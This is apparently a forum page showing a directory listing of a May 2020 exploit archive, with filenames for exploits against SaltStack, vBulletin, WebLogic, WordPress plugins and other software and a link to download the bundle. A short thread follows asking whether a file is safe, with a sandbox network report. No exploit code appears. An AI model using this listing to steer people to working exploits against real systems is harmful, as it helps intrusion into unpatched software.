05/22/2020 10:06 PM 7,059 plesk_mylittleadmin_viewstate.rb.txt
05/06/2020 12:03 AM 10,313 poc_atutor_2.2.4_iterate_hashbits.py.txt
05/12/2020 11:11 PM 2,608 qdpm91-upload.txt
05/19/2020 05:38 PM 2,857 qdpm91persist-xss.txt
05/28/2020 07:20 PM 3,962 qnapqtsphotostation603-exec.txt
05/22/2020 02:59 AM 21,589 QSA-qmail.txt
05/13/2020 05:01 PM 3,103 rda230157-overflow.txt
05/05/2020 11:59 PM 11,306 saltstack30001-exec.txt
05/12/2020 11:17 PM 9,223 saltstack_salt_unauth_rce.rb.txt
05/07/2020 06:16 PM 1,334 schoolfms10-sql.txt
05/05/2020 11:49 PM 2,085 simplephpgal07-rfi.txt
05/07/2020 06:17 PM 6,185 solarwindsmsp-permissionexec.txt
05/27/2020 07:21 PM 1,737 streamripper3226-overflow.txt
05/19/2020 05:39 PM 876 submitty200401-xss.txt
05/14/2020 11:49 PM 865 subrion421-xsrf.txt
05/14/2020 11:48 PM 2,074 subrion421encoding-xss.txt
05/22/2020 10:03 PM 7,476 synology_dsm_smart_exec_auth.rb.txt
05/19/2020 11:32 PM 6,383 SYSS-2019-039.txt
05/01/2020 09:32 PM 5,174 SYSS-2020-012.txt
05/02/2020 02:02 AM 4,300 tplinkncxx-hardcoded.txt
05/02/2020 01:22 AM 5,452 tplinkncxxbonjour-inject.txt
05/02/2020 02:55 AM 2,392 tplinkncxxsek-inject.txt
05/06/2020 12:07 AM 7,005 trixbox_ce_endpoint_devicemap_rce.rb.txt
05/12/2020 11:01 PM 2,420 tylertecheagle2018311-exec.txt
05/15/2020 05:48 PM 13,154 vbulletin561-sql.txt
05/04/2020 07:50 PM 5,520 veeam_one_agent_deserialization.rb.txt
05/19/2020 05:46 PM 2,247 victorcms10-shell.txt
05/11/2020 06:30 PM 2,574 victorcms10-sql.txt
05/19/2020 05:33 PM 2,021 victorcms10-xss.txt
05/25/2020 05:04 PM 2,178 victorcms10adduser-xss.txt
05/19/2020 05:34 PM 733 victorcms10catid-sql.txt
05/07/2020 06:34 PM 14,098 VL-2196.txt
05/04/2020 08:26 PM 6,043 VL-2219.txt
05/13/2020 05:29 PM 8,244 VL-2226.txt
05/07/2020 06:19 PM 7,854 VL-2229.txt
05/13/2020 05:28 PM 9,760 VL-2233.txt
05/07/2020 06:25 PM 10,678 VL-2234.txt
05/07/2020 06:23 PM 9,441 VL-2237.txt
05/04/2020 12:02 PM 10,131 VL-2243.txt
05/07/2020 06:32 PM 7,549 VL-2244.txt
05/08/2020 10:45 PM 4,887 VL-2247.txt
05/08/2020 10:53 PM 5,455 VL-2250.txt
05/08/2020 10:52 PM 5,540 VL-2251.txt
05/08/2020 10:44 PM 5,070 VL-2252.txt
05/22/2020 05:38 PM 3,450 vuplayer249m3udep-overflow.txt
05/06/2020 12:00 AM 992 weberp4151-disclose.txt
05/21/2020 07:42 PM 32,953 weblogic_deserialize_badattrval.rb.txt
05/06/2020 05:49 PM 2,635 webtareas20p8-filedelete.txt
05/08/2020 10:48 PM 1,362 webtareas20p8-xss.txt
05/18/2020 07:47 PM 4,332 wpajaxloadmore531-sql.txt
05/30/2020 08:32 PM 2,549 wpbbpress25-escalate.txt
05/08/2020 10:47 PM 1,634 wpchopslider3-sql.txt
05/12/2020 10:59 PM 1,417 wpchopslider34-sql.txt
05/27/2020 07:20 PM 5,850 wpdragdropucf1332-exec.txt
05/23/2020 10:22 PM 2,742 wpformmaker541-sql.txt
05/29/2020 06:45 PM 932 wpmultischeduler100-xsrf.txt
05/05/2020 11:51 PM 1,245 wpwoocommerce313-xss.txt
05/08/2020 10:40 PM 8,185 XL-2020-001.txt
05/08/2020 10:50 PM 7,941 XL-2020-002.txt
05/08/2020 10:56 PM 14,529 XL-2020-003.txt
05/16/2020 12:35 AM 5,075 XL-2020-004.txt
05/06/2020 05:44 PM 4,904 yeswikicercopitheque202004181-sql.txt
05/06/2020 05:54 PM 1,957 ZSL-2020-5566.txt
168 File(s) 18,260,736 bytes
2 Dir(s) 27,539,755,008 bytes free

Download 202005-exploits.tgz (17 MB)
Source
-
Can someone check whether this file is safe?
Kev replied to grandson's topic in Discutii incepatori
It doesn't lead anywhere.

Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.

You're racking your brains for nothing; it's in Discutii Incepatori, he doesn't know what a VM is, it should be moved here.